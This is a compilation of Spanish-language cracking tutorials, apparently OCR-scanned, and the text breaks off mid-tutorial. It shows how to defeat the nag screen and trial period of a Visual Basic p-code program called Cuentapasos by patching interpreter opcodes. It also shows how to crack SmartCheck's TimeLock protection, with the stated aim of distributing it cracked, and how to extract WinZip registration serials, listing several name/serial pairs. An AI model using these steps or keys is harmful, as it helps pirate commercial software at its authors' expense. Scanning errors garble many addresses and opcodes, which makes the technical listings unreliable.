varias veces el Cuentapasos, y viendo como al cambiar Aceptar al centro, la propiedad Cancel se la activa a 'cmdAceptar(0). 


Veis lo que hay en el evento 15243. Justo después de inicializar el botón de Comprar y justo antes de los de Aceptar y Salir, se genera un 
número aleatorio mediante la función Rnd(). Por su delatadora situación, creo que todos apostaríamos el brazo a que la decisión de dónde se 
colocan los botones, tiene mucho que ver con el numerito obtenido. Si nos las amañamos para que dicho numerito tenga siempre un valor 
fijo, el botón Aceptar se quedará fijo. 


Vemos desde donde se invoca la función Rnd(), ¿desde "MSVBVM50.DLL!000FE7BD"? Arrea, ¿qué es esto?. Comenzamos a mirar el 
resto de funciones y TODAS se ejecutan desde las direcciones OFE7BD y OFE7ED de MSVBVMS50.DLL, exceptuando aquellas que tengan 
que ver con objetos visuales (forms, botones...) 


¿Se nos vuelve loco el SmartCheck con programas p-compilados? 


La puerta del sótano 


Vamos a ver si el Softlce nos aclara algo. Lo primero que debemos hacer, como con todos los programas de Visual Basic, es cargar los 
símbolos de las librerías de VB. En este caso, como nos lo ha "chivado" el SmartCheck, es la librería MSVBVMS50.DLL. Lo de 
"MSVBVM” debe ser algo así como MicroSoft Visual Basic Virtual Machine, o máquina virtual de Visual Basic (toda una máquina de 
torturas, ya vereis...) 


Consultamos cuál de las funciones que exporta, puede ser Rnd(). Tenéis un listado de todas las funciones que se exportan en el tutorial de 
Mr.Brown para VBS. Nos saltan a los ojos dos de ellas: 


Addr:0F004A95 Ord: 593 (0251h) Name: rtcRandomNext 
Addr:0F03AE08 Ord: 594 (0252h) Name: rtcRandomize 


Visual Basic dispone de dos funciones para generar números aleatorios: 


e Randomize. Se utiliza para inicializar el generador de números aletorios. El Cuentapasos la utiliza, por ejemplo, al inicio del 
frmRegistro_Load. 
e Rnd(). Devuelve un número aleatorio entre 0 y 1. 


La función Rnd() se corresponderá con la rtcRandomNext exportada por la Dll. Lo primero que debemos ver es el número de veces que el 
Cuentapasos llama a la función Rnd() antes de la llamada que nos interesa. Nos colocamos en el SmartCheck y buscamos las llamadas a 
Rndó(. Se producen dos llamadas, la nuestra es la segunda. 


Bajada a los infiernos 


Nos vamos al Softlce, y colocamos un bpx rtcRandomNext. Volvemos al Windows y ejecutamos el Cuentapasos. Vemos como se carga el 
splash y ... BOOM... salta el Softlce. Como la que nos interesa es la segunda llamada, pulsamos Ctrl+-D y enseguida vuelve a saltar el punto 
de ruptura. No nos importa que es lo que hace la función rteRandomNext para generar el número aleatorio, solo nos interesa saber que es 
lo que el Cuentapasos se propone hacer con él. Pulsamos F11 y salimos justo destrás del call que llamó a la función, en la dirección 
OFOFE7COh de la DII del VB. 


La función Rnd() devuelve un número entre cero y uno, por lo que debe devolverlo en los registros de punto flotante. Para ver el contenido 
de esos registros desde Softlce escribimos wf. Efectivamente, el número aleatorio generado se encuentra en el registro STO. 


Empezamos a ejecutar paso a paso pulsando F8, y en seguida encontramos algo interesante: 


OFOFE7CC mov al, [esi] 
OFOFE7CE inc esi 
OFOFE7CF jmp ds: [eax*4+0F0FED94] 


Cargamos en AL el contenido de la dirección apuntada por ESI (0F4h), incrementamos ESTI y saltamos a una dirección que depende de lo 
que hemos leído con ESI. Si vemos a dónde esta apuntado ESTI, descubriremos que está apuntando al código de nuestro querido 
Cuentapasos. 


Tras el salto, aterrizamos en OFOFDE15. Seguimos pulsando F8 y vemos como se carga en la pila un byte de valor OAh que está en el 
código del Cuentapasos (siempre apuntado por EST). Nuevamente, uno de los bytes del código del ejecutable (OEBh) es utilizado para 
efectuar un salto exactamente igual que antes, al contenido de la dirección OEBh*4+0FOFED94=0F0FF140 


Esta vez vamos a parar a OFOFDSES, en donde el OAh cargado anteriormente en la pila es volcado en el registro STO, desplazando el 
número aleatorio al ST1. Se elimina el OAh de la pila y se vuelve a realizar otro salto igual que el anterior. 


Caemos en OFOFDFCB. Vamos a parar un momento a ver si nos aclaramos la cabeza antes de que cometamos una locura con el monitor y la 
silla ... 


Una luz al final del pasillo... 


Nos desplazamos por la ventana de código y le echamos una mirada a los alrededores de donde estamos situados. Nos encontramos 
porciones de código de 5-10 instrucciones, todas terminadas por el mismo código que cité antes; carga de un byte apuntado por ESI en AL, 
incremento ESI y salto al contenido de la dirección calculada como EAX*44+0FOFED94h. 


Vamos a echarle un vistazo a esa especie de tabla de direcciones que parecen usar todas las porciones de código al terminar para proseguir 
con la ejecución. Miremos, por ejemplo, en la dirección OFOFF140h, que se cálculo al final de la parte de código que cargo el OAh del 
código del Cuentapasos en la pila. Encontramos en dicha dirección, OFOFDSES5h, que es la dirección de la porción de código en la que se 
carga el contenido de la pila en STO. Las direcciones que se encuentran alrededor, apuntan igualmente a porciones de código que al 
finalizar, vuelven a recurrir a esta tabla para ver a donde saltan. 


Del infierno al cielo 


Dicho en otras palabras, el ejecutable (cpasos32.exe) nunca es ejecutado. Su código es leído e interpretado completamente por la DII. Por lo 
tanto, todas y cada una de las instrucciones en ensamblador que conocemos, tendrán que tener una porción de código en la DII que 
las sustituya. 


Volvamos al inicio, a la dirección OFOFE7CCH, justo después de volver de la función Rnd(). Allí, cargamos del ejecutable un byte, OF4h, 
que nos hizo saltar a una dirección en la que se cargo el siguiente byte del ejecutable, OAh, en la pila. Por tanto, nuestro "push OAh" del 
ensamblador que en código máquina se codifica como "6A OA”, en p-code es "F4 OA". El F4h será interpretado como "introducir el 
siguiente byte en la pila" por la tabla situada en OFOFED9Ah, al ejecutarse con la DII. 


No es más que la filosofía de Visual Basic, en la que las funciones más generales no se implementan en los ejecutables, si no en unas 
librerías comunes a todas las aplicaciones de VB, pero llevada a sus últimas consecuencias. No solo se implementan en las librerías las 
funciones más usuales si no que además se meten TODAS las instrucciones que puede ejecutar la aplicación. 


Algunos pensarán, "Pues bien, es tan solo una especie de traducción rara que lo que hace es complicar las cosas. Es un lenguaje 
completamente interpretado. ¿Dónde está esa ventaja del p-code?". Si alguien no lo ve claro ahora, cuando ataquemos a las rutinas de 
cálculo del periodo restante de evaluación, se le abrirán los ojos. 


Clavando un botón 


Recordamos por donde íbamos. Se había generado un número aleatorio entre O y 1 que almacenamos en el registro STO. Posteriormente, 
cargamos un OAh del código del Cuentapasos en el registro STO, desplazando el número aleatorio a STI. 


Nos situamos en OFOFDFCB, en donde multiplicamos el contenido de los registros STO y ST1 almacenando el resultado en STO. Nuevo 
acceso a la tabla de interpretación y aparecemos en OFOFDSBS, en donde el contenido del registro STO es redondeado al entero más cercano 
y volcado a la pila. Se almacenan los flags FPU (que son como los flags de toda la vida pero exclusivos de los registros de coma flotante) en 
el registro EAX. 


Una nueva visita a la tabla y saltamos a OFOFDE28h para cargar un valor de 4 bytes del ejecutable (2) en la pila. En este caso es un "push" 
de una doble palabra, no de un byte. Otro paseo por la tabla y caemos en OFOFE013. Recuperamos de la pila el 2 anterior en ECX, y lo que 
volcamos anteriormente del registro STO en EAX. Dividimos este último por el 2, almacenándose el cociente en EAX y el resto en EDX. Se 
vuelca el resto a la pila y nos disponemos a saltar a otro sitio. 


Del número aleatorio generado, tan solo nos queda el valor volcado a la pila. Al haberse dividido por dos, este valor será O o 1. La 
aplicación decidirá las posiciones de los botones según este valor. Nos hemos quedado con el resto de la división: 


round(x*10) / 2 


donde 'x' es el número aleatorio generado, entre cero y uno. 


Pulsamos Ctrl+D para ejecutar completamente el Cuentapasos. Los que tuvierais como resto de la división un cero, ¿a qué tenéis el botón 
Aceptar a la izquierda? ¿A que los que lo tenéis en centro, el resto os daba uno? 


Podemos probar nuestra teoría tanto con el SmartCheck como con el Softlce (más rápido). Ejecutamos varias veces el Cuentapasos, 
capturando el valor aleatorio devuelto. Calculamos metalmente cual sería el resto y vemos si se corresponde con la ubicación del botón 
Aceptar. 


Todavía podemos ir más lejos. ¿Cómo influye el resto de la división en la elección de qué hace un botón y qué hace el otro? Si recordamos 
lo que vimos con el SmartCheck, 'cmdAceptar' es un array de dos botones. 'cemdAceptar(0) es el botón de la izquierda y 'emdAceptar(1)' el 
del centro. Lo que la aplicación parece hacer, es asignar la función de Aceptar a'cmdAceptar(resto)' y Salir a 'cmdAceptar(resto xor 1). 


Vamos a inmovilizar el puto botoncito de los.... . Tenemos que obligar a que el resto de la división tome siempre el mismo valor, cero o uno, 
independientemente del número aleatorio generado. Se nos pueden ocurrir dos formas: 


e Cambiar las instrucciones. Después del ejercicio que acabamos de hacer, conocemos los códigos que corresponden a varias 
instrucciones (push, división, multiplicación, ..). Así, por ejemplo, podríamos sustituir las instrucciones que multiplican, redondean 
y almacenan en pila el aleatorio generado por un "push 00000002" o un "push 00000001", que ya sabemos como se codifican en p- 
code. Así, en lugar de meter en la pila el aleatorio multiplicado por 10 y redondeado, meteríamos un entero fijo. Debemos tener la 
precaución de que el número de bytes de la instrucción falsa, sobreescriba completamente las instrucciones a las que sustituye, por 


que todavía no conocemos como es el "nop" ;-) 
e Cambiar los operandos. Está es la solución más fácil y segura. 


¿Qué operandos podemos cambiar? Pues tenemos el OAh (de la multiplicación) y el 0000002 (de la división). ¿Formas de obligar a que el 
resto de la división tome un valor fijo? Por lo menos dos: 


e Multiplicar el aleatorio por cero en lugar de diez. Resto de la división cero, Aceptar siempre a la izquierda. 
e Dividir por uno en lugar de dos. Resto de la división cero, Aceptar siempre a la izquierda. 


Si hemos descomprimido el ejecutable, podemos ir realizando los parches sobre disco para ir comprobando que efectivamente funcionan. 
Repetimos los pasos anteriores para ir anotando las direcciones en memoria en las que se encuentra el operando que deseamos cambiar, las 
cadenas que deberemos buscar para localizar estos operandos en el ejecutable descomprimido con un editor hexadecimal, etc.. Ya sabeis 
como se hace esto, ¿verdad? 


Reventamos el P-Code 


Ahora, nos olvidamos del Cuentapasos, del Softlce, de la vecinita esa que está tan buena.... y nos 
concentramos en lo que hemos descubierto sobre el p-code. 


Para enfrentarse contra programas en Visual Basic normales, muchos habréis leído tutoriales 
información sobre funciones clave de Visual Basic que en un momento dado nos pueden ser muy útiles. 
En casi todos, se recomienda la función __vbastrcomp, utilizada por Visual Basic para comparar cadenas 
de texto. Así, en programas en donde debes introducir una clave de registro alfanumérica, la aplicación, 
en algún sitio, deberá comparar la cadena introducida con la que la aplicación considera correcta. 


En programas escritos en otros lenguajes no interpretados, la rutina de comparación de las cadenas se 
incluye en el ejecutable. Sabemos que está ahí, pero no sabemos dónde. En Visual Basic, esa función es 
una de las que no se incluyen en el ejecutable, si no que se encuentra en las librerías compartidas con el 
resto de aplicaciones de VB. En el caso de __vbastrcomp, nos basta con colocar un punto de ruptura en 
esta función. Como puede ser llamada muchas veces, podemos limitar el punto de ruptura a que la 
cadena a comparar sea la que introducimos. 


La facilidad de desproteger los programas en Visual Basic, radica en esta compartición de funciones, que 
nos permite conocer, para algunas tareas específicas, donde colocar nuestro punto de ruptura. 


En el caso del p-code, siguen utilizándose estas rutinas compartidas, pero la novedad es que ahora, no 
solo se comparten una serie limitada de funciones, sino que todas las instrucciones que puede ejecutar un 
programa se han portado a una serie de pequeñas "funciones" en las librerías del VB. Examinando la 
librería del VB, podremos identificar gran cantidad de instrucciones, algunas muy importantes. 


El Cuentapasos me permitirá ilustrar la importancia de este hecho con más claridad. 


30-6=36 


Nos centramos en el cálculo de los días que nos restan para acabar el periodo de evaluación. La 
nagscreen y el 'acerca de...' del Cuentapasos nos muestran los días transcurridos y los días que nos 
restan. 


Ahora bien, ¿me puede decir alguien cómo puede cualquier aplicación (no solo el Cuentapasos), 
sabiendo los días transcurridos y el número de días máximo (30), calcular los días que nos quedan de 


Llegados a este punto algunos pensareis que Mr.Blue está completamente "grillao". La respuesta es 
clara, restando. La resta, en ensamblador, se realiza mediante la instrucción "SUB". ¿Y cómo se hace en 
p-code? Pues como hemos visto, tiene que exisitir una porción de código en MSVBVM50.DLL que se 
utilice para hacer la resta. ¿Vais cogiendo la onda...? ¿Sentís el cosquilleo por la espalda ....? 


Si localizamos dónde se encuentra esa porción de código, podemos colocar un punto de ruptura en ella. 
Puesto que cualquier programa realiza un montón de restas, tendremos que limitar este punto de ruptura 
a que los operandos tomen el valor que nos interesa. En el caso de los periodos de evaluación, 
limitaremos a que el operando del que se sustrae, tenga como valor el número de días de evaluación, o el 
número máximo de ejecuciones, o... Las posibilidades son enormes. 


¿Y dóde está esa función? Para encontrarla, podemos seguir traceando el programa, tarde o temprano 
hará una resta. O también podemos, si tenemos el VB, generarnos un p-code que haga restas, sumas y 
todas las funciones que queramos descubrir. No tenemos más que pasarlo por el Softlce. 


La resta nos la encontramos en OFOFDF78h, y el resto de funciones aritméticas se encuentran a su 
alrededor. Encontramos multiplicaciones de enteros, de flotantes, operaciones lógicas,... todo un surtido. 


La función de resta de enteros, al igual que la de suma de enteros que está más arriba, se encuentran para 
operadores de 16 bits y para operadores de 32 bits. Si queremos colocar puntos de ruptura, los tendremos 
que colocar por duplicado: 


O0FOFDF78 pop eax 
OFOFDF79 sub [espl, eax 
OFOFDF7C jo OFOFDACZ 


0FO0FDF82 xor eax, eax 


0OFOFDF84 mov al, [esi] 
0FOFDF86 inc esi 
O0FOFDF87 jmp ds: [eax*4+0FOFED94] 


Esta función, saca un operador de la pila y se lo resta al que queda en la misma. El resultado queda 
almacenado en la pila, saltando a OFOFDACAR en caso de overflow (EAX>(ESP)). 


En mi Cuentapasos, los días transcurridos son seis así que coloco un punto de ruptura en OFOFDF79 de 
la forma bpx OFOFDF79 if (*(esp)==1E)é (eax==6). 


Lo colocamos también en la versión de 16 bits, por si las moscas: bpx OFOFDF62 if 
(* (esp) ==1E) € (ax==6). 


Pulsamos Ctrl+D, ejecutamos el Cuentapasos y aparecemos en OFOFDF79. Efectivamente, la aplicación 
está intentando hacer 30-6. Examinamos a donde apunta ESTI. A la dirección 4ADF48h, del ejecutable 
del Cuentapasos. En realidad, ESI está ya apuntando a la siguiente instrucción a ejecutar (hace las veces 


de EIP). La instrucción que nos trajo aquí es el byte 'DAEH' de 4ADF47h. 


Aquí, al igual que en el caso anterior podemos cambiar dos cosas: 


e Los operandos. Para cambiarlos tendríamos que retroceder, poner un punto de ruptura antes y 
ver de donde saca el Cuentapasos los valores de los operandos. Para ello, lo mejor es colocar un 
punto de ruptura de acceso a memoria en direcciones anteriores a 4ADF47h (nuestros antiguos 
bpx, se convierten en bpm's). Después traceamos y vamos viendo con atención de donde van 
saliendo los operandos (ingeniería inversa hacia atrás). 

e La instrucción. Podemos cambiar la resta por otra instrucción, o mejor, por una suma ;-) 


¿Como hacemos esto? ¿Cuál es el código de la suma? Veamos, el código de la resta (32 bits) como 
hemos visto es VDAEh. La función de suma, nos la encontramos algo más arriba, en OFOFDF3DHh. Para 
saber su código, nos vamos a la tabla de OFOFED94h. El puntero a la función resta, debe encontrarse en: 


4*0AERh + OFOFED94h = OFOFF04Ch 


Nos vamos allí, y efectivamente encontramos la dirección de la función resta de 32 bits. Vamos a ver 
donde está el puntero a la suma, no debe estar muy lejos. La encontramos cuatro palabras más arriba, en 
OFOFFO3Ch. El código de la suma será por tanto: 


(OFOFFO3Ch - OFOFED94h) / 4 = DAAh 


El crack consitirá en sustituir en aquellos lugares en donde se realice la resta, 30-6 (6 en mi caso), el 
código de la operación resta (OAERh) por el de la suma (OAAh). 


Pulsamos Ctrl+D y vuelve a saltar enseguida el Softlce. En esta ocasión, el culpable es el VAERh situado 
en 4ADFAORh. Lo anotamos y volvemos a pulsar Ctrl+D. Nos aparece la nagscreen. Vamos a por el 
"acerca de...'. Pulsamos Aceptar y abrimos el 'acerca de...' .. otra vez nos salta el Softlce, otro código de 
resta en 04A4716h. Anotamos y Ctrl+D... otro más en 04A4769h. Este es el último. 


Repetimos la prueba, pero ahora, en el primer punto de ruptura, sustituímos los bytes OAEh de 
4ADF47h, 4ADFA9h, 4A4716h y 4A4769h por OAAh. Realizar un cargador que, además de pulsar el 
botón de la nagscreen tal y como se ha explicado, realice los parches en memoria necesarios es sencillo. 
Tenéis un ejemplo en otro tutorial de Esiel2, que casualmente versa sobre el antecesor del actual 


Cuentapasos. 


Quitamos los puntos de ruptura, para probar, CtrI+D y ...... 


a ;-) p-code rulezzz!! 


Conclusiones. 


Hemos mostrado como una protección como la de la nagscreen, correctamente implementada por el 
autor de la aplicación, puede ser fácilmente burlada porque el autor cometió el "error" de programar en 
Visual Basic. De paso, hemos sacado del baúl una técnica casi olvidada pero de una gran potencia, 
mediante la cual podríamos entre otras cosas, automatizar tareas, rellenar formularios automáticamente, 
gastar bromas, etc... 


Hasta aquí, nada nuevo. 


La novedad es el p-code. Inicialmente, en una primera toma de contacto, los programas p-code 
confunden y pueden terminar por aburrir al más intrépido ingeniero inverso. Está invención de 
Microsoft, desde el punto de vista teórico, puede parecer un gran avance ya que está a un paso de la 
creación de programas que puedan ejecutarse en cualquier máquina, independientemente del procesador 
O sistema operativo, siempre y cuando existan unas librerías diseñadas para dicha máquina o sistema 
Operativo que interpreten el código del ejecutable. 


Nada más lejos de la realidad. Lo que en código nativo es una simple instrucción como la resta, se 
convierte en los programas p-compilados en varias instrucciones. Igual ocurre con el resto: push, add,... 
Esto, inevitablemente conduce a que las aplicaciones se enlentezcan o, lo que es lo mismo, que 
necesitemos más recursos (procesadores más rápidos) para poder mantener las mismas prestaciones. Esta 
política de Microsoft, por supuesto favorece a los fabricantes de hardware como Intel. 


Desde el punto de vista de la ingeniería inversa, supone una metedura de pata más de Microsoft (y van 
...). Identificando convenientemente las funciones de interés, podremos facilmente desentrañar las 
protecciones de las aplicaciones. En este tutorial se ha expuesto un método que puede, sistemáticamente, 
echar abajo casi cualquier sistema de protección de aplicaciones p-compiladas, basado en limitaciones en 
el número de ejecuciones, periodos de pruebas, etc... Es cuestión de acostumbrarse, donde poníamos 
antes breakpoints de ejecución ahora ponemos breakpoints de acceso a memoria, donde el EIP decía 
ahora dice el ESL.... 


En cierto modo es triste ver como los desvelos de un programador por proteger su aplicación, colocando 
protecciones a diestro y siniestro, y creando un sistema de protección en conjunto bastante robusto, salta 
en mil pedazos por el hecho de haber utilizado Visual Basic y su "p-compilación”. Si el futuro del Visual 
Basic pasa por el p-code ... o le abrimos los ojos a los programadores y reaccionan o creo que la 
ingeniería inversa de VB se va a volver muy aburrida. 


Para ilustrar dicho método, lo hemos utilizado contra una de las pocas aplicaciones p-compiladas que he 
podido encontrar (por ahora): nuestro entrañable Cuentapasos. Pero no creais que sus protecciones se 
limitan tan solo a la nagscreen y al periodo de evaluación. ¡Que va! El Cuentapasos no se acaba ahí, 
esconde muchos más secretos. Desviaros de la senda seguida en este tutorial para deshacer su protección, 
buscad caminos alternativos. Quedan muchas preguntas por responder: 


Dónde se guardan los días transcurridos? O se guarda la fecha de instalación? 

Dónde se guarda el otro protagonista de la resta, el límite de 30 días? ¿Y si lo cambiamos? 
Cómo se registra el programa? De dónde sale el código de compra? 

Por qué no cambia el número de días transcurridos si cambio la fecha? Cuándo se actualiza? 
El cálculo de los días transcurridos, es igual al ejecutar las primeras veces el Cuentapasos que 
después? 

e Por qué en algunos ordenadores se cierra el programa a los pocos minutos de conexión? 


Investigad, y os encontrareis destellos de calidad del programador, de los que da gusto encontrar en un 
producto nacional, y alguna que otra metedura de pata, de las que hacen que te caigas al suelo de risa ;-D 


Como veis, se podría escribir un libro sobre el Cuentapasos (este tutorial ya es casi un libro). 


En cierta manera somos nosotros los que obligamos a los programadores a profundizar en el arte de la 
programación. Y gran parte de lo que aprenden en el sano intento de "jodernos", lo aplican en otras 
facetas de sus aplicaciones, mejorando sus prestaciones. Aunque la mayoría no lo quieran reconocer, 
parte de lo que saben nos lo deben a nosotros, los "crackers". 


Y por supuestísimo, parte de lo que sabemos nosotros se lo debemos a las "comeduras de coco" de ellos 
a la hora de implementar una protección. 


Agradecimientos: 

Esiel2/TNT .... Ves lo que te has perdido? ... ;-P 

Mr.BlacK/WkT!  .... por sus orientaciones en esta jungla .... 

bb .... NO te CONOZCO, no te he visto, pero tu tutorial es una gozada ..... 
Fravia .... La Biblia On-Line .... 

WkT! .... por creer en un novato .... 

Toby .... ha sido todo un placer "pelearme" contigo (y olvídate del VB) .... 
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Como crackear el SmartCheck by gr00vy 
Download: 


Cracker: grU0vy 


E-mail: |[groovy2600€yahoo.com.ar 
Web: 


Dificultad: Punga 


Herramientas: Softice ( .numega.com), W32Dasm, ( .zencracking.com.ar 
.zencracking.com.ar 


y HexWorkshop ( 


Bueno aca tamos!!!! con otro tuto, ahora le vamos a dar a una de las 
companias que personalmente yo admiro mucho NUMEGA, que creo el mejor 
debuger del mundo, el SICE. Que lastima que no protejan bien sus proggies 
no? 


Bueno instalemos el smartcheck, y en la parte que les pide serial no le 
pngan ninguno asi se instala como un Trial, luego lo que hacemos es 
cargar el SICE y cargar el smartcheck. Una vez abierto el SmartCheck 
cargamos una aplicacion hecha con VB y le damos a Start, ahi nos va a 
aparecer una nag que nos dice que lo registremos y entonces le damos a 
Purchase, una ves ahi introducimos un unlockCode como 31337 y lugo nombre 
y empresa, entramos al sice y ponemos unos bpx como getwindowtexta etc, 
volvemos al smartcheck y hacemos click en Aceptar, Caemos en el sice. 
Vemos que estamos en una dll que no nos sirve, lo que tenemos que hacer 
es apretar F12 y caemos en TL32V20! que es la libreria de Time Lock una 
de las protecciones comerciales que andan por la web, traceamos algo y 
vemos 


:10003E8C€ FF15D4630110 Call dword ptr [100163D4] 
:10003E92 83F802 cmp eax, 00000002 
:10003E95 “7F1C jg 10003EB3 


Ese comprueba si se han introducido los caracteres suficientes para que 
de por valido en nombre, si no salta va a el error. 

Seguimos tracenado y llegamos a una call que nos lleva a 
user32Getwindowtexta!, para salir tenemos que apretar de vuelta F12 
llegamos a 10003ECA y ahi se pushea nuestro nombre, no se apuren que 
estamos cerca!!!, seguimos con el traceo y otra Call nos lleva lejos asi 
que apretamos F12 y aparecemos de vuelta en el codigo, vamos traceando 
(siempre sondeando a ver que hay en cada registro) hasta 10003EE2 y vemos 
que hace unas cosas como estas 


:10003EE2 8D45EC lea eax, dword ptr [ebp-14] 
:10003EE5 8D4DD8 lea ecx, dword ptr [ebp-28]l 


Uhmmm veamos que hay en los registros esos con un D ebp-14 y D ebp-28 
Uhmmm serial malo en ebp-14 y en ebp-28 hay un numero muuuy largo como 
este 2677372677372677, probemos a ver si nos registra, y asi es nos 
registra!!!! Pero tengan en cuanta que el sn este no les va a servir por 
que se genera a traves de un numero preestablecido que se genera al 
momento de instalarlo ok? 

Tonces que podemos hacer con este proggie para distribuirlo crackeado??? 
Pues como les habia dicho esta protejido aparentemente con el Timelock y 
sabemos que la libreria que utiliza para hacer la proteccion es la 
t132v20.d11 ubicada en c:liwindows asi que la desensamblamos y vamos a 
10003EE5 que es donde se hace el Lea al serial bueno, y vemos que mas 
abajo hay: 


:10003EEA E891170000 call 10005680 
:10003EEF 83C408 add esp, 00000008 


:10003EF2 85C0 test eax, eax 
:10003EF4 7553 jne 10003F49 


Invertimos el salto y vemos que se restaura el tiempo de trial asi que lo 
podemos seguir usando unos dias mas hasta que se invalidise y luego lo 
registramos de nuevo. El que tiene ganas de hacer que quede registrado 
con cualquier nombre que lo haga el mismo, ya que ando con pocas ganas de 
seguir escribiendo, ya que son las 5 am y tengo ganas de dormir un rato 
ok? 

Bueno nos vemos y espero que les halla gustado!!!! 


Como sacar un Serial Number para el Winzip 8.1 por 
gr00Ovy 


Cracker: gr00vy 
Web: www.ZenCracking.com.ar 


E-mail: groovy2600fyahoo.com.ar 
Dificultad: Facil ++ 


Herramientas: WwWw.zencracking.com.ar 


Hola que tal, como veran volvemos otra ves con el Winzip, pero esta 
ves no para crackearlo sino para sacar el S/N. 


Ok, el tuto es muy simple, si leyeron bien el tuto sobre como 
crackearlo al winzip seguro que les va a salir facilmente. Lo que 
tenemos que hacer es abrir el softice para sacar el serial. 


Bueno empecemos, abrimos el winzip y nos aparece la nag, muy bien, 
vamos a darle masa ¿? Vamos a la seccion donde tenemos que introducir 
el sn y ponemos cualquier cosa. Luego con ctrl+d vamos al softice y 
ponemos unos breakpoints (bpx getwindowtexta y bpx getdlgitemtexta) 
ctrl+d para ir al winzip y apretamos ok para compruebe. Caemos en la 
librería USER32 o por ahí nomas, pero un secreto, como tenemos dos 
textboxs primero lo que comprovaria en el primer salto del sice seria 
el nombre asi que apretamos F5 para volver al winzip y Caemos devuelta 
al sice en USER32, ahora ya estamos Casi en el lugar correcto, 
apretamos F12 para salir de la funcion getdlgitemtexta y Caemos mas o 
menos por aca: 


* Reference To: USER32.GetDl1lgltemTextA, Ord:0107h 


:0040BD00 FF15F4C54A00 Call dword ptr [004AC5F4] 
:0040BD06 56 push esi 

:0040BD07 E8B14A0500 call 004607BD 

:0040BDOC 56 push esi 

:0040BDO0D E8D44A0500 call 004607E6 

:0040BD12 803D90C74C0000 cmp byte ptr [004CC790], 00 
:0040BD19 59 pop ecx 

:0040BD1A 59 pop ecx 

:0040BD1B 745F je 0040BD7C 

:0040BD1D 803DBCC74C0000 cmp byte ptr [004CC7BC], 00 
:0040BD24 7456 je 0040BD7C 


Lo que hace aca es comprovar si el nombre (gr00vy) tiene la cant 
suficiente de numeros, aca se necesita un nombre de + de 0 caracteres 
asi que pasamos las comprovaciones, luego en 0040BD26 tenemos una Call 
que parece interesante, vamos a verla, (acuérdense que todavia estamos 
en el softice) entramos y vamos traceando con F10 y tambien viendo que 
es lo que sucede en memoria, haciendo d eax etc. Traceamos y traceamos 
hasta que en 0040b788 vemos un 

LEA EAX, [EBP-0144] hacemos click derecho en EBP-0144 y ponemos 
DISLAY y vemos que no smuestra un numero medio extranio??? Que sera? 
Espero que sea el serial number :) 


Bueno espero que les halla gustado a todos y que les sirva de algo no? 


User: gr00vy 
S/N: 6AB40597 


User: ZenCracking.com.ar 
S/N: 7EB438AD 


User: S[hliff 
S/N: 7EDC0848 


User: ]-[unter 
S/N: C1B40BBA 


Unos pequeños regalitos para 2 amigos : ) 


WWW .zencracking.com.ar 


How to crack Winzip 9.0 BETA (5480) 


Dificultad: Facil 
Herramientas: W32Dasm y HexWorkShop 


Web: www.winzip.com 
Cracker: gr0O0vy 


Empezemos por decir que esta version no es muy diferente la forma de 
crackearlo a la de los anteriores Winzip's. Ahora vamos a los bifes. 


Intalamos, y ejecutamos. Vemos una nag: 


WinZip 


WinZip is not free software 


Site licensing available 
The purchased version does not display this notice *USD, subject to change 


Evaluation Version 


Use Evaluation Version Enter Registration Code... 


Ahora le damos Enter Registration Code: 


Uhmm todo igual a los demas, bueno veamos que hacer cuando le damos un 
serial asi medio random y.... 


WinZip 


(Xx) Incomplete or incorrect information. 


Ok. Ahora desensamblamos el programa con el W3232Dasm y buscamos la cadena 
Incomplete or incorrect information. 


La vemos mas o menos por aca: 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
| :0040CDC8 (C), :0040CDD1(C), :0040CDDA(C) 


:0040CE23 E8BDF7EFFEFF call 0040C5E5 


* Possible Reference to String Resource ID=00654: "Incomplete or 
incorrect information" 


:0040CE28 688E020000 push 0000028E 

:0040CE2D E80AAAO500 call 0046783C 

:0040CE32 50 push eax 

:0040CE33 53 push ebx 

:0040CE34 6A3D push 0000003D 

:0040CE36 E857890400 call 00455792 

:0040CE3B 83C410 add esp, 00000010 
:0040CE3E FF0520604D00 inc dword ptr [004D6020] 
:0040CE44 833D20604D0003 cmp dword ptr [004D6020], 00000003 
:0040CE4B 0F85F8000000 jne 0040CF49 

:0040CE51 6A00 push 00000000 


Lo que esta en negrita son las direcciones de los saltos que llaman al 
cartel de Mal. Asi que veamos que es lo que hay en c/u de esas 
direcciones: 


:0040CDBF 803DE0814D0000 cmp byte ptr [004D81E0], 00 
// Comprueba si el nombre esta o no 


:0040CDC6 59 pop ecx 

:0040CDC7 59 pop ecx 

:0040CDC8 7459 je 0040CE23 

:0040CDCA 803D0C824D0000 cmp byte ptr [004D820C], 00 


// Lo mismo de arriba pero este comprueba el serial si esta o no 


:0040CDD1 7450 je 0040CE23 

:0040CDD3 E864FCFEFEF call 0040CA3C 

// Una llamada importante, al parecer es la que genera/comprueba el 
serial 


:0040CDD8 84C0 test al, al 
:0040CDDA 7447 je 0040CE23 


Lo que podriamos hacer aca es invertir los saltos esos y ver que pasa. 
Pero.. mejor sigamos adelante: 


Ahroa estamos dentro de la call importante, vemos esto: 


* Referenced by a CALL at Addresses: 
| :00401063 , :00404578 , :00404AC2 , :0040CDD3 , :00459245 


:0040CA3C 55 push ebp 

:0040CA3D 8BEC mov ebp, esp 

:0040CA3F 81EC40030000 sub esp, 00000340 

:0040CA45 A1204B4D00 mov eax, dword ptr [004D4B20] 
:0040CA4A 334504 xor eax, dword ptr [ebp+04] 
:0040CA4D 803DE0814D0000 cmp byte ptr [004D81E0], 00 
:0040CA54 8945FC mov dword ptr [ebp-04], eax 
:0040CA57 7507 jne 0040CA60 

:0040CA59 32C0 xor al, al 

:0040CA5B E945020000 jmp 0040CCA5 


Uhmmm cuantas Call para conprobar el serial, veamos que hay adentro de 
cada una de ellas: 


Ahora dentro de 00401063: 


:00401063 E8D4B90000 call 0040CA3C 
:00401068 84C0 test al, al 
:0040106A 746E je 004010DA << invertimos 106a 


Ahora dentro de 00404578: 


:00404578 E8BF840000 call 0040CA3C 
:0040457D 84C0 test al, al 
:0040457F “7409 je 0040458A << invertimos 457f 


Ahora dentro de 00404AC2: 


:00404AC2 E8757F0000 call 0040CA3C 
:00404AC7 84C0 test al, al 
:00404AC9 “7516 jne 00404AE1 << invertimos 4ac9 


// invirtiendo esto sacamos el titulo de Beta Test, asi que hara tenemos 
la final release 
// Del winzip 9 :P 


:00404ACB E8AODOFFEF call 00401B70 

:00404AD0 84C0 test al, al 

:00404AD2 740D je 00404AE1 

* Possible StringData Ref from Data Ob] ->" (Beta test)" << Interesante, 


miren lo que pasa :P 


Ahora dentro de 0040CDD3: 


